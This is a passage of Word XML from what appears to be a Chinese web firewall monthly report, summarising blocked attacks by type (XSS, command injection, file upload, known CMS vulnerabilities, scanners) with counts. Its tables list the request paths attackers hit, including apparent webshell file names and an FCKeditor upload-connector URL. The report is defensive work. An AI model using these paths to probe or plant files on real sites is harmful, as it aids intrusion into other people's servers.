        </w:rPr>
        <w:t>PDF跨站攻击</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>【描述】攻击者利用网站漏洞把恶意脚本代码注入到网页中，当其他用户浏览这些网页时，就会执行其中的恶意代码，对受害用户可能采取 Cookies 资料窃取、会话劫持、钓鱼欺骗等各种攻击。攻击风险等级：高。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:cs="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>【攻击详情】</w:t>
      </w:r>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992"/>
        <w:gridCol w:w="3154"/>
        <w:gridCol w:w="1245"/>
        <w:gridCol w:w="1245"/>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目的地址 TOP5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:shd w:color="auto" w:val="clear" w:fill="7EC0EE"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>攻击次数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:shd w:color="auto" w:val="clear" w:fill="7EC0EE"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>对比分析</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vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>/favicon.ico</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>较上月--，攻击占比--</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:afterLines="1" w:beforeLines="1" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:cs="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:b w:val="true"/>
          <w:i w:val="false"/>
          <w:strike w:val="false"/>
          <w:color w:val=""/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>系统命令访问攻击</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>【描述】命令注入攻击的一种，通过数据输入方法访问系统内的.exe的执行文件，最终导致信息泄露或者正常数据的破坏。攻击风险等级：高。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:cs="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>【攻击详情】</w:t>
      </w:r>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992"/>
        <w:gridCol w:w="3154"/>
        <w:gridCol w:w="1245"/>
        <w:gridCol w:w="1245"/>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目的地址 TOP5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:shd w:color="auto" w:val="clear" w:fill="7EC0EE"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>攻击次数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:shd w:color="auto" w:val="clear" w:fill="7EC0EE"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>对比分析</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vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>/search.php、/utility/convert/data/config.inc.php、/plus/90sec.php、/fdgq.php、/uploads/dede/sys_verifies.php?action=down</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>216</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>较上月--，攻击占比--</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:afterLines="1" w:beforeLines="1" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:cs="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1.3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:b w:val="true"/>
          <w:i w:val="false"/>
          <w:strike w:val="false"/>
          <w:color w:val=""/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>命令注入攻击</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>【描述】仅仅需要输入数据的场合，却伴随着数据同时输入了恶意代码，而装载数据的系统对此并未设计良好的过滤过程，导致恶意代码也一并执行，最终导致信息泄露或者正常数据的破坏。攻击风险等级：高。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:cs="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>【攻击详情】</w:t>
      </w:r>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992"/>
        <w:gridCol w:w="3154"/>
        <w:gridCol w:w="1245"/>
        <w:gridCol w:w="1245"/>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目的地址 TOP5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:shd w:color="auto" w:val="clear" w:fill="7EC0EE"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>攻击次数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:shd w:color="auto" w:val="clear" w:fill="7EC0EE"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>对比分析</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vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>/、/1.php、/3G.php、/Config_Shell.php、/admin_login.php</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>130</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>较上月--，攻击占比--</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:afterLines="1" w:beforeLines="1" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:cs="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1.4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:b w:val="true"/>
          <w:i w:val="false"/>
          <w:strike w:val="false"/>
          <w:color w:val=""/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>文件限制</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>【描述】由于文件上传功能实现代码没有严格限制用户上传的文件后缀以及文件类型，导致允许攻击者向某个可通过 Web 访问的目录上传任意文件，会让攻击者注入危险内容或恶意代码，并在服务器上运行。攻击风险等级：高。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:cs="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>【攻击详情】</w:t>
      </w:r>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992"/>
        <w:gridCol w:w="3154"/>
        <w:gridCol w:w="1245"/>
        <w:gridCol w:w="1245"/>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目的地址 TOP5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:shd w:color="auto" w:val="clear" w:fill="7EC0EE"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>攻击次数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:shd w:color="auto" w:val="clear" w:fill="7EC0EE"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>对比分析</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vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>/1.asa、/cmd.asa、/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=FileUpload&amp;Type=File&amp;CurrentFolder=%2F、/data/cache/inc_catalog_base.inc、/2.cer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>345</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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>(www.dingxinsec.com.cn:443)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>/junhe.php/general.profile/update</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>较上月--，攻击占比--</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:afterLines="1" w:beforeLines="1" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:cs="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1.5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:b w:val="true"/>
          <w:i w:val="false"/>
          <w:strike w:val="false"/>
          <w:color w:val=""/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>疑似跨站攻击</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>【描述】攻击者利用网站漏洞把恶意脚本代码注入到网页中，当其他用户浏览这些网页时，就会执行其中的恶意代码，对受害用户可能采取 Cookies 资料窃取、会话劫持、钓鱼欺骗等各种攻击。攻击风险等级：高。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:cs="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>【攻击详情】</w:t>
      </w:r>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992"/>
        <w:gridCol w:w="3154"/>
        <w:gridCol w:w="1245"/>
        <w:gridCol w:w="1245"/>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目的地址 TOP5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:shd w:color="auto" w:val="clear" w:fill="7EC0EE"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>攻击次数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:shd w:color="auto" w:val="clear" w:fill="7EC0EE"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>对比分析</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vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>/utility/convert/index.php?a=config&amp;source=d7.2_x2.0、/plus/moon.php、/utility/convert/data/config.inc.php、/plus/mytag_js.php?aid=9090</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>较上月--，攻击占比--</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:afterLines="1" w:beforeLines="1" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:cs="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1.6 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:b w:val="true"/>
          <w:i w:val="false"/>
          <w:strike w:val="false"/>
          <w:color w:val=""/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>漏洞防护</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>【描述】Web系统中，远程攻击者会使用一些公开的漏洞对系统进行攻击，以达到获取数据库、控制服务器等目的。如struts2漏洞、tomcat解析漏洞等。攻击风险等级：高。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:cs="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>【攻击详情】</w:t>
      </w:r>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992"/>
        <w:gridCol w:w="3154"/>
        <w:gridCol w:w="1245"/>
        <w:gridCol w:w="1245"/>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目的地址 TOP5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:shd w:color="auto" w:val="clear" w:fill="7EC0EE"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>攻击次数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:shd w:color="auto" w:val="clear" w:fill="7EC0EE"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>对比分析</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vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>/admin_aspcms/_system/AspCms_SiteSetting.asp、/、/index.php?m=member&amp;c=index&amp;a=register&amp;siteid=1、/index.php/api/Uploadify/preview、/xmlrpc/config.php</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>94</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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>(www.dingxinsec.com.cn:443)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t><![CDATA[/junhe.php/ajax/lang?callback=define&controllername=general.profile&lang=zh-cn&v=1640769846&v=1640769846、/junhe.php/ajax/lang?callback=define&controllername=general.profile&lang=zh-cn&v=1640770117&v=1640770117、/junhe.php/ajax/lang?callback=define&controllername=general.profile&lang=zh-cn&v=1640773935&v=1640773935、/junhe.php/ajax/lang?callback=define&controllername=general.profile&lang=zh-cn&v=1640774273&v=1640774273、/junhe.php/ajax/lang?callback=define&controllername=general.profile&lang=zh-cn&v=1640774311&v=1640774311]]></w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>较上月--，攻击占比--</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:afterLines="1" w:beforeLines="1" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:cs="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1.7 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:b w:val="true"/>
          <w:i w:val="false"/>
          <w:strike w:val="false"/>
          <w:color w:val=""/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>扫描工具</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>【描述】Web系统中，远程攻击者会使用一些扫描工具对站点进行漏洞扫描。工具如awvs、nessus等。根据扫描结果，攻击者可能会发现web系统的漏洞，针对漏洞进行攻击以达到黑客的目的；如果没有发现web系统的漏洞，但是流量也非常大，造成web系统的负担。攻击风险等级：低。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:cs="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
